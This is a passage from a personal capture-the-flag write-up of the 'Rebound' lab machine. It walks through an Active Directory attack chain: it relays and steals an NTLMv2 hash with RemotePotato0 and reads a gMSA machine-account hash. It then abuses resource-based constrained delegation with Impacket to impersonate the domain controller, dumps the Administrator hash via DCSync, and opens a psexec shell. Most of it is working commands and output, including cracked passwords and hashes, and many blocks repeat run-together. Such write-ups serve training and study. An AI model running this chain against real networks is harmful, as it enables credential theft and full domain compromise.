da01c36b1d131dc676f30000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f00
75006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200
650062006f0075006e0064002e0068007400620007000800fdb2cc76ca1dda01060004000600000008003000300000000000000001000000
002000000e7ff7fe6b0991ab4a9b6620e70681ec0df8c1fdd30593dc0bb1841a890e6db30a00100000000000000000000000000000000000
090000000000000000000000PS C:\ProgramData> .\RemotePotato0.exe -m 2 -r 10.10.14.15 -x 10.10.14.15 -p 9999
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. R
emember to forward tcp port 135 on 10.10.14.15 to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!
NTLMv2 Client : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash : tbrady::rebound:c67e86d5206fee69:8bec5d7e00ab42bdf9775aef77317d21:0101000000000000fdb2cc76ca1d
da01c36b1d131dc676f30000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f00
75006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200
650062006f0075006e0064002e0068007400620007000800fdb2cc76ca1dda01060004000600000008003000300000000000000001000000
002000000e7ff7fe6b0991ab4a9b6620e70681ec0df8c1fdd30593dc0bb1841a890e6db30a00100000000000000000000000000000000000
090000000000000000000000and instanly i got the hash for that user, so i transfer it to my windows host box, and crack it and got the creds
TBRADY CREDS
tbrady : 543BOMBOMBUNmanda
with those cred, using tools such as RunasCs.exe and GMSAPasswordReader.exe i could read the hash for the machine account DELEGATOR$
READ MACHINE GMSA MACHINE ACCOUNT
PS C:\ProgramData> .\RunasCs.exe tbrady 543BOMBOMBUNmanda "C:\ProgramData\GMSAPasswordReader.exe --accountname D ELEGATOR$" [*] Warning: The logon for user 'tbrady' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token. Calculating hashes for Old Value [*] Input username : delegator$ [*] Input domain : REBOUND.HTB [*] Salt : REBOUND.HTBdelegator$ [*] rc4_hmac : CD903918320095660FF2E12072F5551C [*] aes128_cts_hmac_sha1 : FB5D91D42C9161EA97106DA01AAC440F [*] aes256_cts_hmac_sha1 : 61064C12662B3CEB3D80D85498AA25641660B1B158D08D626B5E80FE6B88286E [*] des_cbc_md5 : E040D0A1C2682A08 Calculating hashes for Current Value [*] Input username : delegator$ [*] Input domain : REBOUND.HTB [*] Salt : REBOUND.HTBdelegator$ [*] rc4_hmac : F8DB61F5FD0643C073CD58FFCC81379F [*] aes128_cts_hmac_sha1 : 7B060E4BD433D7F9848EBFFF8995F11E [*] aes256_cts_hmac_sha1 : 35215B71A30B208458FFB9F5705500DED5223DBF0F0FBFE77732BB8C9AF15FBA [*] des_cbc_md5 : C4AEA2F7549D0D10
PS C:\ProgramData> .\RunasCs.exe tbrady 543BOMBOMBUNmanda "C:\ProgramData\GMSAPasswordReader.exe --accountname D
ELEGATOR$"
[*] Warning: The logon for user 'tbrady' is limited. Use the flag combination --bypass-uac and --logon-type '8'
to obtain a more privileged token.
Calculating hashes for Old Value
[*] Input username : delegator$
[*] Input domain : REBOUND.HTB
[*] Salt : REBOUND.HTBdelegator$
[*] rc4_hmac : CD903918320095660FF2E12072F5551C
[*] aes128_cts_hmac_sha1 : FB5D91D42C9161EA97106DA01AAC440F
[*] aes256_cts_hmac_sha1 : 61064C12662B3CEB3D80D85498AA25641660B1B158D08D626B5E80FE6B88286E
[*] des_cbc_md5 : E040D0A1C2682A08
Calculating hashes for Current Value
[*] Input username : delegator$
[*] Input domain : REBOUND.HTB
[*] Salt : REBOUND.HTBdelegator$
[*] rc4_hmac : F8DB61F5FD0643C073CD58FFCC81379F
[*] aes128_cts_hmac_sha1 : 7B060E4BD433D7F9848EBFFF8995F11E
[*] aes256_cts_hmac_sha1 : 35215B71A30B208458FFB9F5705500DED5223DBF0F0FBFE77732BB8C9AF15FBA
[*] des_cbc_md5 : C4AEA2F7549D0D10there was other ways to read the password such as using Crackmapexec with the module --gmsa but since the authentication on LDAP was kind of broken, i first needed to request a tiket and connect using crackmapexec with the tiket
Request ticket and use CME to read the GMSA password of the Machine account DELEGATOR$
lucas@parrot ~/machines/rebound/exploit/root getTGT.py 'rebound.htb/tbrady:543BOMBOMBUNmanda' -dc-ip 10.10.11.231 Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Saving ticket in tbrady.ccache lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=tbrady.ccache lucas@parrot ~/machines/rebound/exploit/root cme ldap 10.10.11.231 -k --use-kcache --gmsa SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.231 636 DC01 [+] rebound.htb\tbrady from ccache LDAP 10.10.11.231 636 DC01 [*] Getting GMSA Passwords LDAP 10.10.11.231 636 DC01 Account: delegator$ NTLM: f8db61f5fd0643c073cd58ffcc81379f
lucas@parrot ~/machines/rebound/exploit/root getTGT.py 'rebound.htb/tbrady:543BOMBOMBUNmanda' -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in tbrady.ccache
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=tbrady.ccache
lucas@parrot ~/machines/rebound/exploit/root cme ldap 10.10.11.231 -k --use-kcache --gmsa
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.231 636 DC01 [+] rebound.htb\tbrady from ccache
LDAP 10.10.11.231 636 DC01 [*] Getting GMSA Passwords
LDAP 10.10.11.231 636 DC01 Account: delegator$ NTLM: f8db61f5fd0643c073cd58ffcc81379fwith the hash, i could request a tiket, and then authenticate as DELEGATOR$.
AUTHENTICATE AS DELEGATOR USING A TGT AND CME
lucas@parrot ~/machines/rebound/exploit/root getTGT.py 'rebound.htb'/'delegator$' -dc-ip 10.10.11.231 -hashes :F8DB61F5FD0643C073CD58FFCC81379F Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Saving ticket in delegator$.ccache lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=delegator\$.ccache lucas@parrot ~/machines/rebound/exploit/root cme ldap 10.10.11.231 -k --use-kcache SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) LDAPS 10.10.11.231 636 DC01 [+] rebound.htb\delegator$
lucas@parrot ~/machines/rebound/exploit/root getTGT.py 'rebound.htb'/'delegator$' -dc-ip 10.10.11.231 -hashes :F8DB61F5FD0643C073CD58FFCC81379F
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in delegator$.ccache
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=delegator\$.ccache
lucas@parrot ~/machines/rebound/exploit/root cme ldap 10.10.11.231 -k --use-kcache
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.231 636 DC01 [+] rebound.htb\delegator$once i did that, i knewd that i could operate as that user and i could start thinking about how to attack the delegation over DC01
STRATEGY
there are multiples tipes of delegation (Constrained, Uncontsrained, and RBCD(Resource Based Contrained Delegation)), additionaly there is teh bronze ticket attack, and other stuff, but in this case, due to the fact that i could delegate the MACHINE DC01, but not directly , because it was protected against delegation from the machine account DELEGATOR$, but since i owned that permission, i could transfer that permission to another user or machine account, and delegate the DC01 as that user, that was like a bypassing strategy, but i could not figuere out by my self, since my main strategy was to request a S4U using rubeus from isnide the box, but it always falided when trying to request the last tiket to delegat , due to the protection that was over the dc01
The overall stepst that i found on hacktrikcs were:
1. leverage the priviledges to another account , by updating the attributemsDS-AllowedToActOnBehalfOfOtherIdentity
2 . DELEGATOR$ will trust on the user or machine accoutn that we setted that priviledge.
3. we request a ticket for the account that we leverage that priviledge with the ability to impersonate the user that we want , in this case DC01$
the bloodhound module suggest this
BD SUGGESTION
In the following example, victim is the attacker-controlled account (i.e. the hash is known) that is configured for constrained delegation. That is, victim has the "HTTP/PRIMARY.testlab.local" service principal name (SPN) set in its msds-AllowedToDelegateTo property. The command first requests a TGT for the victim user and executes the S4U2self/S4U2proxy process to impersonate the "admin" user to the "HTTP/PRIMARY.testlab.local" SPN. The alternative sname "cifs" is substituted in to the final service ticket. This grants the attacker the ability to access the file system of PRIMARY.testlab.local as the "admin" user.
the thing is that bloodhoundw as talking about a constrained delegation so taht did not help to much.
however there was some helpful resources in internet that talks about this more deeply
this was a graphic that explains it better
so the first step was to read the attribute of the machien account DELEGATOR$nad for doing this i could use a toold called rbcd.py which was specifically designed for this
rbcd.py 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -action read -k -no-pass Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
rbcd.py 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -action read -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is emptyknowing that it was empty, i could add the flag delegate-from and append a user that i had control over, in this case i was going to use ldap_monitor, and change the flagread for write to give the attribute to him
lucas@parrot ~/machines/rebound/exploit/root rbcd.py 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -action 'write' -k -no-pass -delegate-from 'ldap_monitor' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
lucas@parrot ~/machines/rebound/exploit/root rbcd.py 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -action 'write' -k -no-pass -delegate-from 'ldap_monitor'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)now if i ran the command again to check the value of msDS-AllowedToActOnBehalfOfOtherIdentity i could see the user ldap_monitor there
lucas@parrot ~/machines/rebound/exploit/root rbcd.py 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -action read -k -no-pass Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Accounts allowed to act on behalf of other identity: [*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
lucas@parrot ~/machines/rebound/exploit/root rbcd.py 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -action read -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)in this point, i could try to delegate the DC01 as ldap_monitor, so first i requested a tgt to work as him
getTGT.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -dc-ip 10.10.11.231 Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Saving ticket in ldap_monitor.ccache lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=ldap_monitor.ccache
getTGT.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in ldap_monitor.ccache
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=ldap_monitor.ccachethen reuqest a TGS for the SPN of delegator, in this case browser/dc01.rebound.htb
lucas@parrot ~/machines/rebound/exploit/root getST.py -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Impersonating dc01$ [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in dc01$.ccache
lucas@parrot ~/machines/rebound/exploit/root getST.py -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccacheknow with that ticket, i could use it to delegate the DC01, so iexported the ticket and requested a delegation to dc01
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=dc01\$.ccache
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=dc01\$.ccache
lucas@parrot ~/machines/rebound/exploit/root getST.py -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01\$.ccache" "rebound.htb/delegator$" -k -no-pass -hashes :F8DB61F5FD0643C073CD58FFCC81379F Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Getting TGT for user [*] Impersonating dc01$ [*] Using additional ticket dc01$.ccache instead of S4U2Self [*] Requesting S4U2Proxy [*] Saving ticket in dc01$.ccache
lucas@parrot ~/machines/rebound/exploit/root getST.py -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01\$.ccache" "rebound.htb/delegator$" -k -no-pass -hashes :F8DB61F5FD0643C073CD58FFCC81379F
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Getting TGT for user
[*] Impersonating dc01$
[*] Using additional ticket dc01$.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccachefinally by having the ticket as DC01$, i ahd the dcsync over the domain, so i could dump the sam with secrets dump
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=dc01\$.ccache lucas@parrot ~/machines/rebound/exploit/root secretsdump.py "rebound.htb"/'dc01$'@"dc01.rebound.htb" -k -no-pass -just-dc-user Administrator Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1 Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f Administrator:des-cbc-md5:ad8ac2a825fe1080 [*] Cleaning up...
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=dc01\$.ccache
lucas@parrot ~/machines/rebound/exploit/root secretsdump.py "rebound.htb"/'dc01$'@"dc01.rebound.htb" -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...and finally with teh hash of administrator i could connect however i wanted and grab the root.txt
getTGT.py -dc-ip 10.10.11.231 rebound.htb/Administrator -hashes :176be138594933bb67db3b2572fc91b8 Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Saving ticket in Administrator.ccache lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=Administrator.ccache lucas@parrot ~/machines/rebound/exploit/root psexec.py rebound.htb/Administrator@dc01.rebound.htb -k -no-pass Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Requesting shares on dc01.rebound.htb..... [*] Found writable share ADMIN$ [*] Uploading file RupWsVcI.exe [*] Opening SVCManager on dc01.rebound.htb..... [*] Creating service DiJP on dc01.rebound.htb..... [*] Starting service DiJP..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.4720] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> type \users\administrator\desktop\root.txt 0aebf6d9000396cb05378e622c9cd7ca
getTGT.py -dc-ip 10.10.11.231 rebound.htb/Administrator -hashes :176be138594933bb67db3b2572fc91b8
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in Administrator.ccache
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=Administrator.ccache
lucas@parrot ~/machines/rebound/exploit/root psexec.py rebound.htb/Administrator@dc01.rebound.htb -k -no-pass
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on dc01.rebound.htb.....
[*] Found writable share ADMIN$
[*] Uploading file RupWsVcI.exe
[*] Opening SVCManager on dc01.rebound.htb.....
[*] Creating service DiJP on dc01.rebound.htb.....
[*] Starting service DiJP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4720]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type \users\administrator\desktop\root.txt
0aebf6d9000396cb05378e622c9cd7ca